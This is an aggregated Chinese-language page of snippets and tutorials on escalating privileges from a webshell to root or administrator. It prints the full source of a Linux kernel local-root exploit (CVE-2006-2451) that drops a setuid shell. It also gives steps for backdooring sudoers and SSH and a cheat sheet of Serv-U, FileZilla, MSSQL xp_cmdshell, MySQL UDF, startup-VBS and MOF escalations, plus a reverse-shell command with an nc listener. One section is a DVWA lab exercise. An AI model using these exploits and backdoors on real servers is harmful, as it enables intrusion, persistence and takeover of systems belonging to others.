-
2021-05-18 13:36:09
没啥技术含量,一种思绪,让某些得到Root权限WebShell的同窗能够快点拿到权限。
某日拿到某站WebShell,RedHat(红旗linux)系统,Tomcat顺序是Root身份启动的,WebShell当然也拥有Root权限。
详细提权思绪:
1.WebShell直接替换Root密码:/etc/shadow //记得备份
2.准许Root议决ssh登陆:
修正:/etc/ssh/sshd_config
PermitRootLogin yes #准许Root登陆
3.重启ssh服务:service ssh restart
4.以Root身份登陆ssh,添加一个用户:
useradd application
passwd //依据提示配置密码
5.修改application用户运转su不需密码:
chmod +w /etc/sudoers //添加写入权限,默许只读
修正:/etc/sudoers
vi /etc/sudoers
参与:application ALL=(ALL) NOPASSWD: ALL
6.把Root密码修正回原样,制止Root登陆。并去除sudoers的写属性(chmod -w /etc/sudoers)。
7.当然开头还要:chmod -w /etc/sudoers
Root用户登陆。
普通用户登陆,su免密码进入Root权限。
更多相关内容 -
webshell提权教程.doc
2022-01-08 22:45:25webshell提权教程 -
Linux下WEBSHELL提权
2021-05-13 14:45:21用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。... 2.6.17.4)因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行...用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。
前提:1、目标机上安装了GCC能编译源码
2、Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)
因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把当前运行HTTP进程的用户加入到ROOT组(红色显示),让WEBSHELL有ROOT权限.
/**********溢出代码**************************/
/* Local r00t Exploit for: */
/* Linux Kernel PRCTL Core Dump Handling */
/* ( BID 18874 / CVE-2006-2451 ) */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */
/* By: */
/* - dreyer (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ;
gpasswd -a wwwrun root ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n");
sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n");
system("/tmp/sh -p");
}
把上面的代码保存为tmp.c,上传到目标主机/tmp目录下,接着PHPSHELL里编译gcc -o tmp tmp.c ,然后执行./tmp(有时候需要执行几次才能成功).
用whoami命令看下你会发现你的WEBSHELL权限是ROOT.
char *payload 后面的命令都是以ROOT执行的,如果开放了SSH并且没做登陆限制,可以直接到那添加一个用户并加入到ROOT组,自己发挥~~~~~
-
webshell提权
2018-09-11 22:45:25提权:主要是针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得服务器权限 通常所处的权限: ASP/PHP 匿名权限 ASPX USER权限 JSP 通常是系统权限 收集信息: 内外网 ...提权
提权前奏
- 提权:主要是针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得服务器权限
- 通常所处的权限:
- ASP/PHP 匿名权限
- ASPX USER权限
- JSP 通常是系统权限
- 收集信息:
- 内外网
- 服务器系统和版本位数
- 服务器的补丁情况
- 服务器的安装软件情况
- 服务器的防护软件情况
- 端口情况
- 支持脚本情况
- 。。。。。。
- 信息收集常用命令
- windows:
- ipconfig /all:查看当前ip
- net user:查看当前服务器账号情况
- netstat -ano:查看服务器端口开启情况
- ver:查看当前服务器操作系统
- systeminfo:查看当前服务器配置情况(补丁情况)
- tasklist -PID pid号:结束某个pid号的进程
- taskkill /im qq.exe /f:结束QQ进程
- net user x 123123 /add:添加一个名为x密码为123123的用户
- net localgroup administrators x /add:将用户x添加到管理员组
- whoami:查看当前操作用户(当前权限)
- linux:
- ls -al:查看当前目录下的文件和文件夹
- pwd:查看当前操作路径
- uname -a:查看当前服务器内核信息
- cmd无法执行
- 原因:
- 防护软件拦截
- cmd被降级
- 组件被删除
- 办法:找可读写目录上传cmd.exe,将执行的cmd.exe路径替换成上传的路径,再次调用执行
- 查找3389端口
- 注册表读取
- 工具扫描
- 命令探针
第三方软件提权
server -u 提权
- 有修改权限
- 检查是否有可写权限 修改server -u 默认安装目录下的ServUDaemon.ini
- 增加用户
- 连接
- 执行命令:
quote site exec net user x 123123 /add
quote site exec net localgroup administrators x /add
- 无修改权
- 暴力破解md5
- 溢出提权
pcanywhere提权
- 访问pcanywhere默认安装目录
- 下载用户配置文件
- 通过破解账户密码文件
Radmin提权
- 通过端口扫描,扫面4899端口
- 上传radmin.asp木马读取radmin的加密密文
- 使用工具连接
VNC提权
- 通过读取注册表十进制数
- 将得出的十进制数去掉第一个数,其他的转换成十六进制数
- 破解十六进制数得到密码
- vnc4.exe -W 回车
- 输入转换后的十六进制数
- 连接VNC
g6ftp提权
- 下载管理配置文件,将administrar管理密码破解
- 使用lcx端口转发(默认只允许本机连接)
- lcx.exe -tran 8027 127.0.0.1 8021
- 使用客户端以管理员用户登录
- 创建用户并设置权限和执行的批处理文件
- 上传批处理
- 以创建的普通用户登录ftp
- 执行命令 quote site x.bat
- x.bat 内容为添加系统用户,提权
破解hash提权
- 上传pwdump.exe 运行获取hash值
- 拿到lc5、彩虹表中破解,即可得到管理员密码
360本地提权(09年)
- 上传cmd.exe和360.exe
- 运行360.exe
- 生成五次shift后门
flashfxp提权
- 下载quick.dat文件
- 覆盖替换到本地
- 获取网站管理密码
FileZilla提权
- filezilla是一款开源的FTP服务器和客户端的软件
- 若安装了服务器端默认只侦听127.0.0.1的14147端口
- 并且默认安装目录目录下有两个敏感文件filezillaserver.xml(包含了用户信息)和filezillaserver interface.xml(包含了管理信息)
- 提权思路:
- 下载这两个文件拿到管理密码
- 配置端口转发,登录远程管理ftpserve。创建ftp用户
- 分配权限,设置家目录为C:\
- 使用cmd.exe改名为sethc.exe,替换c:\windows\system32\sethc.exe生成shift后门
- 连接3389按5次shift调出cmd.exe
搜狗输入法提权
- 找到搜狗输入法安装目录,上传组件
- 覆盖搜狗输入法调用的组件
- 当管理员使用搜狗输入法时,组件被调用,账号创建完成
pr提权
- 上传pr.exe
- 运行
- pr.exe “net user”
巴西烤肉提权
- 与pr一样
启动项提权
- 前提写入的目录需要写入权限
- 将批处理文件上传到开机启动项目录,等待管理员重启
数据库提权
MSSQL提权
- 步骤
- 安装组件
- 开启3389
- 创建用户
- 提升权限
- 安装cmd_shell组件
- EXEC sp_configure ‘show advance options’,1
- GO
- RECONFIGURE
- GO
- EXEC sp_configure ‘xp_cmdshell’,0
- GO
- RECONFIGURE
- GO
MySQL数据库提权
UDF提权
-
原理:通过root权限导出duf.dll到系统目录下,可以通过udf.dll调用执行cmd
-
获取对方的mysql数据库下的root账号密码:
- 查看网站源码里面的数据库配置文件(inc,conn,config,sql,common,data等)
- 查看数据库安装路径下的user.myd(/data/mysql)
- 暴力破解 mysql密码破解 3306端口入侵
-
导出duf.dll
- C:\Winnt\udf.dll 2000
- C:\Windows\udf.dll 2003
- 5.1以上版本需要导出到mysql安装目录lib\plugin\
- create function cmdshell returns string soname ‘udf.dll’
- select cmdshell(‘net user x 123123 /add’);
- select cmdshell(‘net localgroup administrators x /add’);
- drop function cmdshell; 删除函数
启动项提权
-
拿到root权限
-
查看数据库中有什么表
show tables;
- 在TEST数据库中建立一个新表
create table a (cmd text);
- 在表中插入内容:
insert into a values ("set wshshell=createobject(""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1 /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0)");
- 这三条命令会建立一个VBS的脚本程序
- 查看表a内容 ·
select * from a
- 表a中确定是插入的三条数据后,输出表为一个VBS的脚本文件 `select * from a into outfile “c://docume~1//administrator//开始菜单//程序//启动//a.vbs”;
- 重启
MOF提权
- 第一种方法:
- 上传mof.php。输入相关信息,执行命令,完成提权
- 第二种方法:
- 上传文件x.mof
- 使用select命令导出到正确位置
select load_file(C:/wmpub/nullevt.mof) into dumpfile "C:/windows/system32/wbem/mof/nullevt.mof";
- 允许外部地址使用root用户连接的sql语句
grant all privileges on *.* to 'root'@'%' identified by 'kdm001' with grant option;
反弹端口提权
- 利用mysql客户端工具连接mysql服务器。然后执行下面的操作:
mysql.exe -h ip -uroot -p
- enter password
mysql>\.c:\mysql.txt;
mysql>select backshell("IP",2010);
- 本地监听你反弹的端口
nc.exe -vv -i -p 2010
- 成功后,将获得一个system权限的cmdshell。
linux溢出提权
linux提权
- uname -r 查看系统内核版本
- 找到对应的内核版本的exp
- 上传–>编译–>运行
3389
开启3389
- 使用
- 批处理开3389
- 使用sql语句开3389
- 使用exe开3389
- 使用VB开3389
嗅探3389和http登陆的密码
- wireshark
- cain
-
webshell提权教程
2014-07-04 01:41:52webshell提权教程 -
Mysql提权-基于Mysql的webshell提权
2021-04-24 02:05:39基于Mysql的webshell提权【实验目的】通过本实验理解webshell的使用方法,掌握如何通过webshell执行sql命令进行提权,熟悉基本的webshell提权思路。【实验环境】攻击机:Win2008-att用户名college,密码360College...基于Mysql的webshell提权
【实验目的】
通过本实验理解webshell的使用方法,掌握如何通过webshell执行sql命令进行提权,熟悉基本的webshell提权思路。
【实验环境】
攻击机:Win2008-att
用户名college,密码360College
使用的webshell文件:dama.php
目标靶机:Win2003-DVWA
用户名college,密码360College
【实验步骤】
1.在靶机Win2003-DVWA上,启动phpstudy,开启漏洞环境。
2.在攻击机上,启动Firefox浏览器,登录靶机上的DVWA网站。
网站的URL为:http://【靶机IP地址】/dvwa
登录用户名为admin,密码为password
3.成功登录DVWA网站后,选择网站左侧菜单“DVWA Security”,将DVWA网站安全等级设置为“Low”。
4.选择网站左侧菜单“File Upload”,将攻击机Win2008-att桌面文件夹Tools中的dama.php(实验中所用的webshell)上传至靶机。
5.dama.php上传成功后,在攻击机浏览的地址栏中输入如下URL连接dama.php:
http://【靶机IP地址】/dvwa/hackable/uploads/dama.php
出现登录提示框时,输入密码hucyuansheng登录。
6.成功登录dama.php后,选择左侧菜单“提权工具”->“MySQL操作”,输入MySQL数据库的登录密码root,以root用户权限登录。
7.选择数据库test,并执行如下操作:
(1)利用如下命令在test下创建一个新的表a:
create table a(cmd text);
该数据表表名为a,表中只存放一个字段,字段名为cmd,为text文本。
(2)利用如下命令在表a中插入内容:
insert into a values("set wshshell=createobject (""wscript.shell"")");
insert into a values("a=wshshell.run(""cmd.exe /c net user 1 1 /add"",0)");
insert into a values("b=wshshell.run(""cmd.exe /c net localgroup administrators 1 /add"",0)");
注意双引号和括号以及后面的"0"一定要输入!将用这三条命令来建立一个vbs脚本程序!后面的"0"表示不弹出CMD窗口,安静地运行。
上述三条命令执行成功后,可以看到如下图所示的结果,表a中已保存了相应的内容。也可以通过执行如下命令查看表a中的内容:
select * from a;
(3)利用如下命令创建一个vbs脚本程序,并将其输出至靶机操作系统的开始启动项中:
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
8.在靶机上验证攻击效果。
(1)点击“开始”菜单->“启动”,会发现启动项中有一个a.vbs的脚本程序;
(2)重启靶机后,在cmd下输入net user命令,会看到靶机操作系统中被添加了一个用户“1”。
实验至此结束。
思考与总结
通过本次实验成功实现了基于webshell执行mysql命令来写入一个自启动功能的vbs脚本,掌握了基于webshell进行提权的方法,能够结合操作系统安全策略,配置数据库和操作系统的各项访问权限。
标签:webshell,php,DVWA,提权,Mysql,靶机,dama
来源: https://www.cnblogs.com/miansj/p/13996089.html
-
虚拟主机封杀webshell提权!!!!!!!!!!
2020-10-01 01:55:57虚拟主机封杀webshell提权!!!!!!!!!! -
Linux下WEBSHELL提权一技
2014-06-15 18:49:07Linux下WEBSHELL提权一技 用phpshell2.0和配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。 -
webshell 提权
2019-05-09 11:12:21服务器教程-webshell 提权方法 服务器提权教程 webshell提权拿服务器方法总结 - xysoul的专栏 - CSDN博客 最全面的 webshell 提权资料之一 - 颓废's Blog -
常用webshell提权方法
2018-02-28 23:17:31pcAnywhere提权:1.利用pcAnywhere提权,前提条件是pcAnywhere默认安装到默认路径,以及它的目录安全权限有users权限,如果管理员删除了users和power users用户的目录权限,只剩下administer和system用户目录权限,则... -
CVE-2018-8120-Webshell下可用版本提权
2018-07-16 17:34:49Microsoft Windows中存在提权漏洞,该漏洞源于Win32k组件没有正确的处理内存中的对象。攻击者可利用该漏洞在内核模式下以提升的权限执行任意代码。 2 漏洞标识符 CVE ID: CVE-2018-8120 3 影响系统 受影响系统:... -
webshell提权工具
2011-10-25 20:58:48内有各种提权工具 支持webshell 巴西烤肉 NC LCX PR等等 -
WEBSHELL提权方法总结
2013-02-24 16:38:52WEBSHELL提权方法总结,大家可以看一下,不明白QQ我 -
webSHELL提权
2011-09-11 17:56:37SHELL提权 今天给大家带来一个 webshell提权教程 -
webshell提权工具工具
2010-11-26 15:59:33web提权工具,一个好用的serv-u目录查看工具,哈哈哈哈哈哈哈哈 -
最全的WEBSHELL提权方法总结
2010-12-28 13:46:21最全的WEBSHELL提权方法总结,非常的经典。网站入侵和网络安全必看 -
webshell提权与asp木马提权
2017-11-12 02:02:00c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell #!/usr/bin/perl binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27); $_ = $ENV{... -
海盗webshell提权工具包
2009-10-09 12:25:40海盗webshell提权工具包 详细介绍:海盗webshell提权工具包 包含了常用的各类提权工具 轻松应付提权难题 -
基于webshell提权
2017-08-18 15:32:141.Server-u提权 通过webshell读取server-u配置文件,修改配置,添加系统用户 1,利用webshell读取服务器信息,发现服务器系统安装server-u服务,默认端口号43958 2.创建用户账户:cmd /c ... -
Webshell提权-漏洞银行大咖面对面-危险漫步
2017-11-29 16:15:26webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后... -
WEBSHELL 提权方法总结
2017-04-19 19:42:14WEBSHELL 提权方法总结 在得到了一个 Webshell 之后,如果能进一步利用系统的配置不当取得更高的权限,一直是广大黑友们所津 津乐道的话题,也是高手和菜鸟间最大的区别。本文将从一个大角度总括当前流行的各种提权... -
无心webshell提权工具包最终版
2010-01-16 11:37:01无心webshell提权工具包最终版无心webshell提权工具包最终版 -
Webshell的Windows提权
2021-10-29 15:55:49本文仅提供于学术探讨,如有后果自行承担。 Webshell的Windows提权 内网搭建 -
webshell提权拿服务器方法总结
2015-03-20 14:12:25今天有朋友希望更新一些关于提权的一些文章,加上小残今天有时间所以在这里为大家讲解下本人的一般拿到webshell的提权思路把。 1.我相信很多朋友刚拿到webshell以后都会尝试是否能执行CMD命令,如果可以执行... -
无心webshell提权工具包
2011-09-10 18:08:53无心webshell提权工具包,简单实用,易上手~~~~~~~~~~~~~! -
webshell最新内核提权工具
2011-07-29 17:15:48webshell最新内核提权工具 用法很简单 就是 xx.exe “命令” 比巴西烤肉和pr要好用很多 很多都能提权 -
webshell下LINUX提权+留后门
2021-05-13 14:44:23方法一:setuid的方法,其实8是很隐蔽。看看过程: [root@localdomain lib]... test这个文件baidu貌似木有上传功能撒,木办法传 貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....